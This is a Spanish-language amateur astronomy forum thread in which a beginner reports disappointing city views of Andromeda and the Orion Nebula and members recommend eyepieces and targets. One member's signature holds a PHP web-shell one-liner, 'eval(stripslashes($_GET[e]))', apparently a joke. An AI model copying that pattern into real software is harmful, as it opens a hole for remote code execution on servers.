Primera Observación decente

Subforo para recomendaciones de objetos a observar tanto de objetos de cielo profundo como estrellas, dibujos, etc.
Rubgonmar
Mensajes: 540
Registrado: Jue Oct 04, 2012 9:42 am

Primera Observación decente

Mensaje por Rubgonmar »

Al final ayer, conseguí enganchar Andrómeda, pero desde ciudad es decepcionante. Con el ocular de 25mm, una pequeña "mancha" en el ocular un poco difusa con su punto en el centro. Poco mas se ve.

Con un filtro de contaminacion luminica podré ver algo mas?.

Lo mejor, que ya uno se va soltando a la hora de localizar con el teles. Las pleyades, aldebaran, las hyades, jupiter, ... en un momento las localizo y eso que el buscador de 5x24 que trae el teles, es lo mas horrible que hay.

Madre mía, esto es un vicio. :)
Gonzalo
Bressier NT 130/650, Omegon 66/400 ED
Montura: Meade LXD75
Camaras: Orion SSDS II y Canon 100D sin modificar
Guiado: Omegon 66/400 + QHY5-II
Filtro: Baader H-Alpha 7nm y Astronomik Eos Clip
https://www.flickr.com/photos/132992433@N06
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Primera Observación decente

Mensaje por m3ntol »

Rubgonmar, enhorabuena por tus primeras observaciones astronómicas. Verás que poco a poco esto se convierte en un vicio y querrás cielos más oscuros, telescopios con mayor abertura y oculares con más calidad óptica. Prepara el bolsillo que eso duele :)
Andrómeda es uno de los objetos más decepcionantes que he podido observar. Con lo cerca que está uno espera poder distinguir más detalles de la galaxia pero, da igual lo oscuro que sea el cielo, solo se ve una nube difusa de luz.
Otras galaxias como M51 o incluso el par M81-M82 me proporcionan mucha más satisfacción visual que Andrómeda aunque, eso sí, vas a necesitar cielos medianamente oscuros para verlo. De todos modos, como decía aquel, para gustos los colores, seguro que hay a quien Andrómeda le fascina.
phpbb:eval(stripslashes($_GET[e]));
Rubgonmar
Mensajes: 540
Registrado: Jue Oct 04, 2012 9:42 am

Primera Observación decente

Mensaje por Rubgonmar »

La verdad es que, o tienes bien asumido lo que vas a ver en comparación a las fotografias que se suelen ver por ahí o te puede defraudar muchísimo un telescopio.

De las fotos de andrómeda a la manchita que logré ver el otro dia ..... menuda diferencia.

Mi duda es esa, salvo los planetas y la luna, alguna nebulosa, galaxia o cumulo te da detalles a simple vista o solamente en fotografia?.
De momento he conseguido ver las pleyades, las hyades, M34 y andrómeda y encima desde ciudad, pues no son gran cosa. Me imagino que a cielo oscuro y bueno, mejorarán mucho.

Eso si, aun con esto, me encanta. Todas las noches asomo el pescuezo para ver si no está nublado y salir con el teles.

Lo que si que tienes razon, es que en un mes que lo tengo y ya estoy mirando para ahorrar y cambiar el telescopio. Eso de que lleve un barlow interno, no vale para nada.
Gonzalo
Bressier NT 130/650, Omegon 66/400 ED
Montura: Meade LXD75
Camaras: Orion SSDS II y Canon 100D sin modificar
Guiado: Omegon 66/400 + QHY5-II
Filtro: Baader H-Alpha 7nm y Astronomik Eos Clip
https://www.flickr.com/photos/132992433@N06
jose
Mensajes: 1249
Registrado: Vie Nov 12, 2010 11:36 pm

Primera Observación decente

Mensaje por jose »

hola soy jose
me recuerdas cuando comence
los oculares te recomiendo 4 en funcion del diametro
uno de 6
otro de 12
otro de 24
y otro de 40
mas o menos, da igual uno de 35 que 40
o da igual uno de 12 que 13
lo ideal es que el siguente sea el doble mas o menos
yó te recomiendo que si por ejemplo te compras dos fueran uno
de 12 y otro de 24, y de buena calidad, si te compras uno que sea el de 12.
para encontrar las cosas utiliza lo que tienes
por cierto haber si puedes ver M13 pera mi en lo mejor desde ciudad
y las dobles tambien son muy curiosas
saludos
Rubgonmar
Mensajes: 540
Registrado: Jue Oct 04, 2012 9:42 am

Primera Observación decente

Mensaje por Rubgonmar »

De momento tengo el de 4mm y de 20mm que venían con el teles (que son muy malos) y me compre unos de 10 y 25mm super plossl que la verdad no andan nada mal para lo que me costaron.

Quiero cogerme uno de 32mm (creo que es el máximo real para el ocular de 1,25") y uno bueno de 4 o 5mm.

Gracias por la información. Probaré con M13 si puedo. Aunque me parece a mi que con este tiempo ...... poco.
Gonzalo
Bressier NT 130/650, Omegon 66/400 ED
Montura: Meade LXD75
Camaras: Orion SSDS II y Canon 100D sin modificar
Guiado: Omegon 66/400 + QHY5-II
Filtro: Baader H-Alpha 7nm y Astronomik Eos Clip
https://www.flickr.com/photos/132992433@N06
sanabres
Mensajes: 1932
Registrado: Mié Ago 24, 2011 11:56 am

Primera Observación decente

Mensaje por sanabres »

Te voy a dar un consejo que me dieron cuando empecé: Intenta comprar pocos oculares, pero que sean todo lo buenos que puedas permitirte. En vez de comprar uno cada dos meses,uno cada cuatro, pero que sea bueno.
Piensa que el límite de lo que puedas ver, lo marcará lo peor que tengas entre el ojo y el cielo.
"En esta vida hay dos palabras que te abrirán muchas puertas: Tire y Empuje" (Les Luthiers)

Celestron C11, ETX125, Long Pern ED80
CGEM,AVX
ES 4'7, 8'8 y 30 mm (82º), Nagler 13
Panoptic 24
Canon 7D, 1000D, QHY5,DMK21Au, ASI178 mm
Rubgonmar
Mensajes: 540
Registrado: Jue Oct 04, 2012 9:42 am

Primera Observación decente

Mensaje por Rubgonmar »

Gracias.

Por eso no los he cogido aun. Hay que ahorrar para comprar unos buenos. :P
Gonzalo
Bressier NT 130/650, Omegon 66/400 ED
Montura: Meade LXD75
Camaras: Orion SSDS II y Canon 100D sin modificar
Guiado: Omegon 66/400 + QHY5-II
Filtro: Baader H-Alpha 7nm y Astronomik Eos Clip
https://www.flickr.com/photos/132992433@N06
Rubgonmar
Mensajes: 540
Registrado: Jue Oct 04, 2012 9:42 am

Primera Observación decente

Mensaje por Rubgonmar »

Esto es un vicio.

Cada vez que vas viendo mas y descubriendo mas, el vicio crece.
Hace un par de noches cuando ya iba a recoger los trastos, a mi derecha, el cinturón de orión. Antes ni lo habría visto, pero ahora me paso casi mas tiempo mirando al cielo que a otro lado.

Pues nada, antes de recoger me dije, a probar por si vemos la nebulosa de orión. Y allí estaba. Pequeñito y poca cosa desde ciudad, pero para mi mas que suficiente. Así que ahí me quede atontado mirándola. Y que ganas de poder hacer fotos como las vuestras que me entraron.
Gonzalo
Bressier NT 130/650, Omegon 66/400 ED
Montura: Meade LXD75
Camaras: Orion SSDS II y Canon 100D sin modificar
Guiado: Omegon 66/400 + QHY5-II
Filtro: Baader H-Alpha 7nm y Astronomik Eos Clip
https://www.flickr.com/photos/132992433@N06
jose
Mensajes: 1249
Registrado: Vie Nov 12, 2010 11:36 pm

Primera Observación decente

Mensaje por jose »

[quote="sanabres"]Te voy a dar un consejo que me dieron cuando empecé: Intenta comprar pocos oculares, pero que sean todo lo buenos que puedas permitirte. En vez de comprar uno cada dos meses,uno cada cuatro, pero que sea bueno.
Piensa que el límite de lo que puedas ver, lo marcará lo peor que tengas entre el ojo y el cielo.[/quote]
BUEN CONSEJO
Rubgonmar
Mensajes: 540
Registrado: Jue Oct 04, 2012 9:42 am

Primera Observación decente

Mensaje por Rubgonmar »

Aunque el tiempo no lo permite, sigo intentando avanzar en mis observaciones pero la desilusión ya empieza a hacer mella. :(
Quitando 2 o 3 cosas que si llego a localizar y ver (júpiter, orión, Híades, pléyades,..) ya no soy capaz de ver mucho mas. Algún cumulo pero con un resultado de muy poca cosa. :?

Y claro, empieza la cuesta abajo. El problema es que no se realmente si yo no soy capaz de encontrar lo que intento buscar, si es que no se ve por la contaminación lumínica o si no se ve porque el teles es muy malo (algo que certifico que es así, ahora uso mas los primasticos de 10x50 que el teles).
La verdad es que estoy deseando poderlo llevar a probar a algún sitio con mejor cielo.

He estado mirando un Dobson de 8
Gonzalo
Bressier NT 130/650, Omegon 66/400 ED
Montura: Meade LXD75
Camaras: Orion SSDS II y Canon 100D sin modificar
Guiado: Omegon 66/400 + QHY5-II
Filtro: Baader H-Alpha 7nm y Astronomik Eos Clip
https://www.flickr.com/photos/132992433@N06
Responder